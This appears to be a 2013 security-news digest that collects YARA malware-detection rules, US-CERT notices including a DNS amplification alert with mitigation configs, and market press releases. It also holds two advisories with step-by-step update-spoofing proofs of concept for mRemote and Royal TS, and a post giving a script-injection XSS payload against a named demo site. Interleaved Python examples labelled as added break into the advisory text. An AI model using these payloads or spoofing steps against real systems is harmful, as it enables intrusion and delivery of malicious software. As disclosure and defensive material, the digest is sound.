        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"

    condition:
        $a or $b or $c
}
The rule above is telling YARA that any file containing one of the three strings must be reported as silent_banker.
This is just a simple example, more complex and powerful rules can be created by using binary strings with wild-cards, case-insensitive text strings, special operators, regular expressions and many other features that you can find explained in YARA's documentation.
YARA is multi-platform, running on Windows, Linux and Mac OS X, and can be used through its command-line interface or from your own Python scripts with the yara-python extension.
Python users can also use yara-ctypes by Michael Dorman. He has also written a multi-threaded command-line YARA scanner based on yara-ctypes that can exploit the benefits of current multi-core CPUs when scanning big file collections.
If you are a Ruby user you can use yara-ruby, written by Eric Monti.

More examples

The following are real-life examples of how to use YARA rules to identify malware families.
rule zbot : banker
{
    strings:
        $a = "__SYSTEM__" wide
        $b = "*tanentry*"
        $c = "*<option"
        $d = "*<select"
        $e = "*<input"

    condition:
        ($a and $b) or ($c and $d and $e)
}

rule banbra : banker
{
    strings:
        $a = "senha" fullword nocase
        $b = "cartao" fullword nocase
        $c = "caixa"
        $d = "login" fullword nocase
        $e = ".com.br"

    condition:
        #a > 3 and #b > 3 and #c > 3 and #d > 3 and #e > 3
}
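To make the string modifiers and the #a counts used in the rules above concrete, here is an added example (not YARA's engine, a deliberately small approximation in Python) that compiles the silent_banker, zbot and banbra strings to regular expressions and evaluates each rule's condition over constructed buffers. Simplifications: overlapping occurrences are not counted, and fullword only checks ASCII neighbours even for wide strings.

```python
import re


def compile_text_string(value, modifiers=()):
    """Approximate a YARA text string as a bytes regex.
    Plain strings are ASCII; `wide` alone means UTF-16LE only; `ascii wide` means both;
    `nocase` is case-insensitive; `fullword` forbids alphanumeric neighbours."""
    mods = set(modifiers)
    encodings = []
    if "wide" in mods:
        encodings.append(value.encode("utf-16-le"))
    if "ascii" in mods or "wide" not in mods:
        encodings.append(value.encode("ascii"))
    body = b"(?:" + b"|".join(re.escape(e) for e in encodings) + b")"
    if "fullword" in mods:
        body = rb"(?<![A-Za-z0-9])" + body + rb"(?![A-Za-z0-9])"
    return re.compile(body, re.IGNORECASE if "nocase" in mods else 0)


def compile_hex_string(text):
    """Approximate a YARA hex string: '{6A 40 ?? 00}' -> regex with '??' as any byte."""
    parts = []
    for token in text.strip("{} ").split():
        parts.append(b"." if token == "??" else re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def count(data, regex):
    """YARA's #a: number of occurrences (non-overlapping in this approximation)."""
    return len(regex.findall(data))


SILENT_BANKER = {
    "a": compile_hex_string("{6A 40 68 00 30 00 00 6A 14 8D 91}"),
    "b": compile_hex_string("{8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}"),
    "c": compile_text_string("UVODFRYSIHLNWPEJXQZAKCBGMT"),
}
ZBOT = {
    "a": compile_text_string("__SYSTEM__", ("wide",)),
    "b": compile_text_string("*tanentry*"),
    "c": compile_text_string("*<option"),
    "d": compile_text_string("*<select"),
    "e": compile_text_string("*<input"),
}
BANBRA = {
    "a": compile_text_string("senha", ("fullword", "nocase")),
    "b": compile_text_string("cartao", ("fullword", "nocase")),
    "c": compile_text_string("caixa"),
    "d": compile_text_string("login", ("fullword", "nocase")),
    "e": compile_text_string(".com.br"),
}


def silent_banker_matches(data):
    return any(count(data, r) for r in SILENT_BANKER.values())      # $a or $b or $c


def zbot_matches(data):
    m = {k: count(data, r) > 0 for k, r in ZBOT.items()}
    return (m["a"] and m["b"]) or (m["c"] and m["d"] and m["e"])


def banbra_matches(data):
    return all(count(data, r) > 3 for r in BANBRA.values())           # #a > 3 and ...


if __name__ == "__main__":
    # Constructed sample: UTF-16LE "__SYSTEM__" plus the ASCII marker the zbot rule pairs it with.
    sample = "__SYSTEM__".encode("utf-16-le") + b"\x00\x00*tanentry*"
    print("zbot:", zbot_matches(sample), "| ascii-only:", zbot_matches(b"__SYSTEM__ *tanentry*"))
```

The ascii-only check in the usage line is the point of the wide modifier: the same ten characters stored as narrow bytes do not satisfy $a, which is why rules that target Windows binaries often declare "ascii wide" when either encoding is plausible.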

Change log

version 1.0 (24/09/2008)
  • first release
version 1.1 (05/01/2009)
  • added support for strings containing null (\x00) chars
  • added syntactic construct "x of them"
  • regular expressions syntax changed
  • now regular expressions can begin with any character
version 1.2 (13/01/2009)
  • added support for global rules
  • added support for declaring alternative sub-strings in hex strings
  • added support for anonymous strings
  • added support for intXX and uintXX functions
  • operator "of" was enhanced
  • implemented new operator "for..of"
  • "widechar" is now "wide" and can be used in conjunction with "ascii"
  • improved syntax error reporting in yara-python
  • "compile" method in yara-python was enhanced
  • "matchfile" method in yara-python was substituted by "match"
  • some performance improvements
  • BUGFIX: Wrong behavior of escaped characters in regular expressions
  • BUGFIX: Fatal error in yara-python when invoking matchfile with invalid path twice
  • BUGFIX: Wrong precedence of OR and AND operators
  • BUGFIX: Access violation when scanning MZ files with e_lfanew == -1
  • BUGFIX: Incorrect handling of hex strings in lexer
version 1.2.1 (14/04/2009)
  • libyara: added support for compiling rules directly from memory
  • libyara: interface refactored
  • libyara: is thread-safe now
  • BUGFIX: Invoking pcre_compile with non-terminated string
  • BUGFIX: Underscore not recognized in string identifiers
  • BUGFIX: Memory leak
  • BUGFIX: Access violation on xxcompare functions
version 1.3 (26/10/2009)
  • added a C-like "include" directive
  • added support for multi-sources compilation in yara-python
  • added support for metadata declaration in rules
  • BUGFIX: Incorrect handling of single-line comments at the end of the file
  • BUGFIX: Integer underflow when scanning files of size <= 2 bytes
version 1.4 (13/05/2010)
  • added external variables
  • scan speed improvements
  • added fast scan mode
  • BUGFIX: crash in 64-bits Windows
version 1.5 (22/03/2011)
  • added -l parameter to abort scanning after a number of matches
  • added support for scanning processes memory
  • entrypoint now works with ELF as well as PE files
  • added support for linking with the faster RE2 library (http://code.google.com/p/re2/) instead of PCRE
  • implemented index operator to access offsets where string was found
  • implemented new operator "for < quantifier > < variable > in < set or range > : (< expression >) "
  • BUGFIX: Memory leaks in yara-python
  • BUGFIX: yara.compile namespaces not working with filesources
version 1.6 (04/08/2011)
  • added support for bitwise operators
  • added support for multi-line hex strings
  • scan speed improvement for regular expressions (with PCRE)
  • yara-python ported to Python 3.x
  • yara-python support for 64-bits Python under Windows
  • BUGFIX: Buffer overflow in error printing
version 1.7 (29/03/2013)
  • faster compilation
  • added support for modulus (%) and bitwise xor (^) operators
  • better hashing of regular expressions
  • BUGFIX: yara-python segfault when using dir() on Rules and Match classes
  • BUGFIX: Integer overflow causing infinite loop
  • BUGFIX: Handling strings containing \x00 characters correctly
  • BUGFIX: Regular expressions not matching at the end of the file when compiled with RE2
  • BUGFIX: Memory leaks
  • BUGFIX: File handle leaks

US-CERT Current Activity - Google Releases Google Chrome 26.0.1410.43

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

National Cyber Awareness System
Google Releases Google Chrome 26.0.1410.43


Original release date: March 29, 2013

Google has released Google Chrome 26.0.1410.43 for Windows, Mac, Linux,
and Chrome Frame to address multiple vulnerabilities. These
vulnerabilities could allow a remote attacker to cause a denial of
service or execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome
Release blog entry and update to Chrome 26.0.1410.43.

Relevant URL(s):
<http://googlechromereleases.blogspot.com/search/label/Stable%20updates>

____________________________________________________________________

   Produced by US-CERT, a government organization.
____________________________________________________________________

This product is provided subject to this Notification:
http://www.us-cert.gov/privacy/notification/

Privacy & Use policy:
http://www.us-cert.gov/privacy/

This document can also be found at
http://www.us-cert.gov/ncas/current-activity/2013/03/29/Google-Releases-Google-Chrome-260141043


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQEVAwUBUVWcondnhE8Qi3ZhAQI/0gf+LKk3GHKqL91XH2sSfGZjvGDLk+rD3zAv
MYXDGi4L8xaOlnJTMA/8lzaFqBjHxSEIUAkawKoPfZcilurtn/mwFDHvxTNCuaZX
hKstX5RW64jUvnbE3pcG8xA/hzbn4orPpic0yc2n+tAzJCc6EOrODYZGNZkZlNRZ
bYUgI8BqD7JXHXw3pYpA7NE6TjuY9N6/xbLyGy+wl+XG2Lj2F/uetMyIdrcLRenn
ma9EeNC/fYiaDiIybo5sI41MeUtDKxzuYA5fGYy4M93L+vtn/JpIfI6nLi+VY5GG
VcSk+V/xGfe8I+Ib1en6lYDd8kkILnAb1hNC6UY6vV8Mdrcebh3NRw==
=Wldc
-----END PGP SIGNATURE-----

EMEA Security Appliance Market Shows Strongest Results Yet in 4Q12

According to the latest EMEA Quarterly Security Appliance Tracker from International Data Corporation (IDC), 4Q12 factory revenue for the market reached $696.8 million, a 5.2% increase over the same quarter a year ago. Shipments increased 5.2% year on year, with 200,089 units shipped. For the full year 2012, security appliance market factory revenue was about $2.5 billion, a 2% increase over 2011.

Read more: http://www.eurosecglobal.de/emea-security-appliance-market-shows-strongest-results-yet-in-4q12-says-idc.html

[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50


[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50
===============================================================================

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-100.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mRemote is a software solution that will allow you to manage all your remote
control connections in a single place. Currently it supports the RDP, VNC,
SSH2 and Telnet protocols.

http://www.royalts.com/main/home/mRemote.aspx
http://mremote-portable.softpile.com/58492/download/

Vulnerable is version 1.50, other versions not tested.


###############################################################################
1. Update Spoofing Vulnerability
###############################################################################

The current version of mRemote contains a security vulnerability in its update
mechanism, which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, mRemote issues GET request over HTTP:


GET /mRemote_Update.txt HTTP/1.1
Host: update.mremote.org
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Length: 284
Content-Type: text/plain
Last-Modified: Wed, 22 Apr 2009 18:29:48 GMT
Accept-Ranges: bytes
ETag: "16cc425178c3c91:1e75"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 14:03:07 GMT

Version: 1.50
dURL: http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.exe
clURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html


The mRemote user can click the "Download and Install" button and mRemote
will download and install the update.

This update mechanism contains two security flaws:

1. The update check is done over an unencrypted HTTP channel. A malicious third
party is able to conduct Man-in-the-Middle (MitM) attacks and spoof the server
response. In this way it is possible to instruct mRemote to download a malicious
update.

2. mRemote will execute the downloaded update without digital signature
verification.

Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 update.mremote.org

2. create the text file "mRemote_Update.txt" in the webserver main directory
with the following content:

Version: 1.51
dURL: http://localhost/calc.exe
clURL: http://localhost/mRemote_1.51_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html


3. create the text file "mRemote_1.51_ChangeLog.txt" in the webserver main
directory with the following content:

New version 1.51 available!


4. Place the "calc_EN.exe" file in the webserver main directory.

5. Open mRemote; it will check for updates automatically.

Response: New version 1.51 available!

6. Press the "Download and Install" button. A successful download ends with the response:

Download complete! mRemote will now quit and begin with the installation.

7. Press the "OK" button and the downloaded exe file will be executed.



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1



[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5
===============================================================================

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-101.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Royal TS is a simple, yet powerful tool for administrators, developers,
system engineers and many other IT-focused information workers that supports
them in working effortlessly with their remote systems or management consoles.

http://www.royalts.com/main/home/win.aspx

Vulnerable is version 2.1.5, other versions not tested.


###############################################################################
1. Update Spoofing Vulnerability
###############################################################################

The current version of Royal TS contains a security vulnerability in its update
mechanism, which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, Royal TS issues GET request over HTTP:

GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1
Cache-Control: no-cache
Host: www.royalts.com
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 19:54:39 GMT
Content-Length: 13375

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Major>2</Major>
  <Minor>1</Minor>
  <Build>5</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi</DownloadURL>
  <ReleaseNotes>
&lt;html lang=&quot;en&quot; xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;&lt; ...
  </ReleaseNotes>
</RoyalVersionInfo>



The Royal TS user can click the "Start Download" button and Royal TS
will open the web browser with a download dialog.

This update mechanism contains a security flaw:

The update check is done over an unencrypted HTTP channel. A malicious third
party is able to conduct Man-in-the-Middle (MitM) attacks and spoof the server
response. In this way it is possible to instruct the user to download a malicious
update.
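Both advisories above (mRemote #100 and Royal TS #101) describe the same defect: an update manifest fetched over plain HTTP and acted on without any authenticity check. As an added example that is not code from either vendor, the following validator parses the "Key: value" manifest format shown in the mRemote advisory and refuses any manifest whose download or change-log URL is not HTTPS from an allow-listed host, that is not newer than the installed version, or that lacks an installer digest; the allow-listed hosts, the `sha256` field and the installer bytes are assumptions constructed for the example, and the same checks apply to the XML manifest that Royal TS uses.

```python
"""Added example, not mRemote's or Royal TS's own code: validate an update
manifest before anything is downloaded or executed."""
import hashlib
import hmac
from urllib.parse import urlsplit

# Hypothetical policy the vendor would compile into the client: only these
# hosts may serve manifests, change logs and installers, and only over TLS.
ALLOWED_HOSTS = {"update.mremote.org", "www.mremote.org"}

# Constructed installer bytes and manifests. SPOOFED_MANIFEST is the one the
# advisory served from the spoofed host; GOOD_MANIFEST is what a hardened
# client would require (hypothetical 'sha256' field over the installer).
INSTALLER = b"constructed installer bytes, not a real setup file"
SPOOFED_MANIFEST = """Version: 1.51
dURL: http://localhost/calc.exe
clURL: http://localhost/mRemote_1.51_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
"""
GOOD_MANIFEST = (
    "Version: 1.51\n"
    "dURL: https://www.mRemote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.51_Setup.exe\n"
    "clURL: https://update.mRemote.org/mRemote_1.51_ChangeLog.txt\n"
    f"sha256: {hashlib.sha256(INSTALLER).hexdigest()}\n"
)


def parse_manifest(text):
    """Parse 'Key: value' lines (the mRemote_Update.txt layout) into a dict."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        fields[key.strip()] = value.strip()
    return fields


def parse_version(text):
    """'1.51' -> (1, 51); raises ValueError on anything that is not dotted ints."""
    return tuple(int(part) for part in text.split("."))


def check_manifest(text, installed_version):
    """Return the list of reasons to reject the manifest; empty means accept.

    A vendor signature over the manifest, verified with a key shipped in the
    client, would be the stronger control; it is left out here to stay within
    the standard library, so TLS to a pinned host is what authenticates the
    manifest and its installer digest.
    """
    fields = parse_manifest(text)
    problems = []
    try:
        offered = parse_version(fields.get("Version", ""))
    except ValueError:
        return ["Version field missing or malformed"]
    # Refusing anything not strictly newer blocks replayed or downgraded manifests.
    if offered <= parse_version(installed_version):
        problems.append("not newer than installed version (possible downgrade/replay)")
    for key in ("dURL", "clURL"):
        url = fields.get(key, "")
        parts = urlsplit(url)          # .hostname is lower-cased by urlsplit
        if parts.scheme != "https":
            problems.append(f"{key} not served over https: {url}")
        if parts.hostname not in ALLOWED_HOSTS:
            problems.append(f"{key} host not allow-listed: {parts.hostname}")
    digest = fields.get("sha256", "").lower()
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        problems.append("manifest carries no usable sha256 for the installer")
    return problems


def installer_matches(data, expected_hex):
    """Compare the downloaded installer's SHA-256 with the manifest value in
    constant time; only a match may be handed to the installer."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected_hex.lower())


if __name__ == "__main__":
    print("spoofed manifest:", check_manifest(SPOOFED_MANIFEST, "1.50"))
    print("good manifest:", check_manifest(GOOD_MANIFEST, "1.50"))
    print("installer ok:", installer_matches(INSTALLER, parse_manifest(GOOD_MANIFEST)["sha256"]))
```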


Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 www.royalts.com

2. create the xml file "/dl/RoyalTS/VersionInfo.xml" in the webserver directory
with the following content:

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Major>2</Major>
  <Minor>3</Minor>
  <Build>4</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://localhost/calc.exe</DownloadURL>
  <ReleaseNotes>
New version 2.3.4 available!
  </ReleaseNotes>
</RoyalVersionInfo>


3. Place the "calc.exe" file in the webserver main directory.

4. Open Royal TS; it will check for updates automatically, resulting in the dialog:

New version 2.3.4 available!


5. Press the "Start Download" button. The default web browser window will open
offering the file download:

"You have chosen to open calc.exe"



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------





BYOD and Increased Malware Threats Help Driving Billion Dollar Mobile Security Services Market in 2013, According to ABI Research


LONDON--(BUSINESS WIRE)--Mobile malware has advanced to a new level of sophistication as smart devices continue to gain ground. The number of unique mobile threats grew by 261% in just two quarters. Increasingly complex malware is taking advantage of a wider range of mobile functionalities to exploit vulnerabilities on the device and in the network. Organizations allowing BYOD policies and without proper mobile device management capabilities are at great risk from covert interception and corruption.
More than simple security applications, the demand for specialized services is driving the market for mobile security; network security, managed and professional services are set to become the biggest category for business-to-business mobile security. Bundled network security which includes unified threat management, deep packet inspections, virtual private networks, and remote device management will become increasingly important. The driving markets in mobile security are concentrating on services for mobile device, identity and authentication management, as well as for audits, certification, and consulting.
ABI Research estimates the current Mobile Security Services market to total $1.88 billion by the end of 2013, by far dominating both the Mobile Device and Mobile Application Security markets. “Isolated and standalone security solutions will work for the individual consumer, but for organizational applications and carriers, mobile security services will take the lead,” says Michela Menting, ABI Research’s senior analyst in cyber security.
The market will offer significant opportunities for vendors targeting mobile network operators as well as businesses. Vendors such as Adaptive Mobile and F-Secure are well-placed to consolidate their position for carrier-grade security solutions. Players offering highly-innovative solutions in niche markets include Aujas Networks (India) with professional services and Zimperium (Israel) for mobile IDS/UTM.
ABI Research provides in-depth analysis and quantitative forecasting of trends in global connectivity and other emerging technologies. From offices in North America, Europe and Asia, ABI Research’s worldwide team of experts advises thousands of decision makers through 70+ research and advisory services. Est. 1990. For more information visit www.abiresearch.com, or call +1.516.624.2500.

Contacts

ABI Research
Christine Gallen, +44.203.326.0142
pr@abiresearch.com

Crossbow, a lightweight, cross-platform exploit development framework


I'm proud to announce the open source release of a project I've been working on for a while called Crossbow.  Brought 
to you by Tactical Network Solutions, Crossbow is a framework built in Python whose purpose is to help make exploit
development easier. It currently targets MIPS Linux systems, but I hope to expand it to support other architectures in
the future.

Crossbow announcement:
http://shadow-file.blogspot.com/2013/03/crossbow.html

Multi-part tutorial (Three parts are up as of this message):
http://shadow-file.blogspot.com/2013/03/buffer-overflows-with-crossbow-part-1.html
http://shadow-file.blogspot.com/2013/03/buffer-overflows-with-crossbow-part-2.html
http://shadow-file.blogspot.com/2013/03/buffer-overflows-with-crossbow-part-3.html

Have a great weekend.

Zach Cutlip

Daddy's File Hosting XSS Vulnerability


##############################################
#_Author: Mr.0c3aN
#_Date: 3/29/2013
#_VULN/Exploit Name: Daddy's File Hosting - V2 __XSS Vuln
###############################################
__Main Info:
XSS Vuln found in Daddy's File Hosting - V2.
Simply just go to register page. All form is vulnerable to XSS.
Try: "><script>alert("Mr.0c3aN");</script>
URL: http://demo.daddyscripts.com/dfh/v2/index.php?page=register

100% Working & Useful...
##############################################
#Respect...





US-CERT Alert TA13-088A: DNS Amplification Attacks


National Cyber Awareness System
TA13-088A: DNS Amplification Attacks


Original release date: March 29, 2013

Systems Affected

 * Domain Name System (DNS) servers

Overview

A Domain Name Server (DNS) Amplification attack is a popular form of
Distributed Denial of Service (DDoS) that relies on the use of
publicly accessible open recursive DNS servers to overwhelm a victim
system with DNS response traffic.

Description

A Domain Name Server (DNS) Amplification attack is a popular form of
Distributed Denial of Service (DDoS) that relies on the use of
publicly accessible open recursive DNS servers to overwhelm a victim
system with DNS response traffic. The basic attack technique consists of
an attacker sending a DNS name lookup request to an open recursive DNS
server with the source address spoofed to be the victim's address. When
the DNS server sends the DNS record response, it is sent instead to the
victim. Because the size of the response is typically considerably
larger than the request, the attacker is able to amplify the volume of
traffic directed at the victim. By leveraging a botnet to perform
additional spoofed DNS queries, an attacker can produce an overwhelming
amount of traffic with little effort. Additionally, because the
responses are legitimate data coming from valid servers, it is
especially difficult to block these types of attacks.

While the attacks are difficult to prevent, network operators can
implement several possible mitigation strategies. The primary element in
the attack that is the focus of an effective long-term solution is the
detection and elimination of open recursive DNS resolvers. These systems
are typically legitimate DNS servers that have been improperly
configured to respond to recursive queries on behalf of any system,
rather than restricting recursive responses only to requests from local
or authorized clients. By identifying these systems, an organization or
network operator can reduce the number of potential resources that the
attacker can employ in an attack.

Impact

A misconfigured Domain Name System (DNS) server can be exploited to
participate in a Distributed Denial of Service (DDoS) attack.

Solution

DETECTION

Several organizations offer free, web-based scanning tools that will
search a network for vulnerable open DNS resolvers. These tools will
scan entire network ranges and list the address of any identified open
resolvers.

Open DNS Resolver Project
http://openresolverproject.org
The Open DNS Resolver Project has compiled a list of DNS servers that
are known to serve as globally accessible open resolvers. The query
interface allows network administrators to enter IP ranges in CIDR
format [1].

The Measurement Factory
http://dns.measurement-factory.com
Like the Open DNS Resolver Project, the Measurement Factory maintains a
list of Internet accessible DNS servers and allows administrators to
search for open recursive resolvers [2]. In addition, the Measurement
Factory offers a free tool to directly test an individual DNS resolver
to determine if it allows open recursion. This will allow an
administrator to determine if configuration changes are necessary and
verify that configuration changes have been effective [3]. Finally, the
site offers statistics showing the number of open resolvers detected on
the various Autonomous System (AS) networks, sorted by the highest
number found [4].

DNSInspect
http://www.dnsinspect.com
Another freely available, web-based tool for testing DNS resolvers is
DNSInspect. This site is similar to The Measurement Factory's ability to
test a specific resolver for vulnerability, but offers the ability to
test an entire DNS Zone for several other potential configuration and
security issues [5].

Indicators

In a typical recursive DNS query, a client sends a query request to a
local DNS server requesting the resolution of a name or the reverse
resolution of an IP address. The DNS server performs the necessary
queries on behalf of the client and returns a response packet with the
requested information or an error [6, page 21]. The specification does
not allow for unsolicited responses. In a DNS amplification attack, the
key indicator is a query response without a matching request.
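The indicator just named, a response with no matching request, is something a victim can check for at its own network edge. As an added example that is not part of the US-CERT alert, the following detector runs over constructed flow records, pairs responses with outstanding queries by (local host, resolver, transaction ID), reports every unsolicited response grouped by the resolver that sent it, and computes the response-bytes-to-query-bytes ratio per local host; the record layout, addresses and sizes are assumptions constructed for the example.

```python
"""Added example, not from the US-CERT alert: flag DNS responses that arrive
without a matching outstanding query and rank the resolvers sending them."""
from collections import defaultdict

# Constructed records as captured at the victim network's edge:
# (direction, local_ip, resolver_ip, txid, size_bytes)
# 'Q' = query leaving the network, 'R' = response entering it.
RECORDS = [
    ("Q", "10.0.0.5", "192.0.2.53", 0x1A2B, 64),
    ("R", "10.0.0.5", "192.0.2.53", 0x1A2B, 512),
    ("R", "10.0.0.9", "192.0.2.53", 0x0001, 3000),   # no query ever left for this
    ("R", "10.0.0.9", "192.0.2.53", 0x0002, 3000),
    ("R", "10.0.0.9", "203.0.113.2", 0x0003, 2900),
    ("Q", "10.0.0.6", "192.0.2.53", 0x0042, 70),
    ("R", "10.0.0.6", "192.0.2.53", 0x0042, 4000),   # legitimate but large answer
]


def analyze(records):
    """Return unsolicited responses, per-resolver totals and per-host byte ratios.

    A retransmitted response to a query already answered is also reported as
    unsolicited; that is a tolerable false positive for this indicator.
    """
    pending = set()          # (local, resolver, txid) of queries awaiting a reply
    unsolicited = []
    bytes_out = defaultdict(int)   # query bytes sent per local host
    bytes_in = defaultdict(int)    # response bytes received per local host
    for direction, local, resolver, txid, size in records:
        key = (local, resolver, txid)
        if direction == "Q":
            pending.add(key)
            bytes_out[local] += size
        else:
            bytes_in[local] += size
            if key in pending:
                pending.discard(key)
            else:
                unsolicited.append((local, resolver, txid, size))

    per_resolver = defaultdict(lambda: [0, 0])     # resolver -> [count, bytes]
    for _local, resolver, _txid, size in unsolicited:
        per_resolver[resolver][0] += 1
        per_resolver[resolver][1] += size

    ratios = {}
    for host in set(bytes_out) | set(bytes_in):
        sent = bytes_out[host]
        # A host that received answers but never asked has an unbounded ratio.
        ratios[host] = bytes_in[host] / sent if sent else float("inf")

    return {
        "unsolicited": unsolicited,
        "per_resolver": dict(per_resolver),
        "ratios": ratios,
    }


def suspects(report, min_responses=2):
    """Resolvers that sent at least min_responses unsolicited replies, largest
    byte volume first; these are the open resolvers worth reporting upstream."""
    rows = [(r, c, b) for r, (c, b) in report["per_resolver"].items() if c >= min_responses]
    return sorted(rows, key=lambda row: row[2], reverse=True)


if __name__ == "__main__":
    rep = analyze(RECORDS)
    for entry in rep["unsolicited"]:
        print("unsolicited response:", entry)
    print("suspect resolvers:", suspects(rep))
```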

MITIGATION

Unfortunately, due to the overwhelming traffic volume that can be
produced by one of these attacks, there is often little that the victim
can do to counter a large-scale DNS amplification-based distributed
denial-of-service attack. While the only effective means of eliminating
this type of attack is to eliminate open recursive resolvers, this
requires a large-scale effort by numerous parties. According to the Open
DNS Resolver Project, of the 27 million known DNS resolvers on the
Internet, approximately 25 million pose a significant threat of being
used in an attack [1]. However, several possible techniques are
available to reduce the overall effectiveness of such attacks to the
Internet community as a whole. Where possible, configuration links have
been provided to assist administrators with making the recommended
changes. The configuration information has been limited to BIND9 and
Microsoft's DNS Server, which are two widely deployed DNS servers. If you
are running a different DNS server, please see your vendor's
documentation for configuration details.

Source IP Verification

Because the DNS queries being sent by the attacker-controlled clients
must have a source address spoofed to appear as the victim's system, the
first step to reducing the effectiveness of DNS amplification is for
Internet Service Providers to deny any DNS traffic with spoofed
addresses. The Network Working Group of the Internet Engineering Task
Force released a Best Current Practice document in May 2000 that
describes how an Internet Service Provider can filter network traffic on
their network to drop packets with source addresses not reachable via
the actual packet's path [7]. This configuration change would
considerably reduce the potential for most current types of DDoS
attacks.

Disabling Recursion on Authoritative Name Servers

Many of the DNS servers currently deployed on the Internet are
exclusively intended to provide name resolution for a single domain.
These systems do not need to support resolution of other domains on
behalf of a client, and therefore should be configured with recursion
disabled.

Bind9

Add the following to the global options [8]:
options {
 allow-query-cache { none; };
 recursion no;
};

Microsoft DNS Server

In the Microsoft DNS console tool [9]:
 * Right-click the DNS server and click Properties.
 * Click the Advanced tab.
 * In Server options, select the Disable recursion check box, and then
click OK.

Limiting Recursion to Authorized Clients

For DNS servers that are deployed within an organization or ISP to
support name queries on behalf of a client, the resolver should be
configured to only allow queries on behalf of authorized clients. These
requests should typically only come from clients within the
organization's network address range.

BIND9

In the global options, add the following [10]:
acl corpnets { 192.168.1.0/24; 192.168.2.0/24; };
options {
 allow-query { corpnets; };
 allow-recursion { corpnets; };
};

Microsoft DNS Server

It is not currently possible to restrict recursive DNS requests to a
specific client address range in Microsoft DNS Server. The most
effective means of approximating this functionality is to configure the
internal DNS server to forward queries to an external DNS server and
restrict DNS traffic in the firewall to restrict port 53 UDP traffic to
the internal server and the external forwarder [11].

Rate Limiting Response of Recursive Name Servers

There is currently an experimental feature available as a set of patches
for BIND9 that allows an administrator to restrict the number of
responses per second being sent from the name server [12]. This is
intended to reduce the effectiveness of DNS amplification attacks by
reducing the volume of traffic coming from any single resolver.

BIND9

On a BIND9 implementation running the RRL patches, add the following lines
to the options block of the authoritative views [13]:
rate-limit {
 responses-per-second 5;
 window 5;
};

Microsoft DNS Server

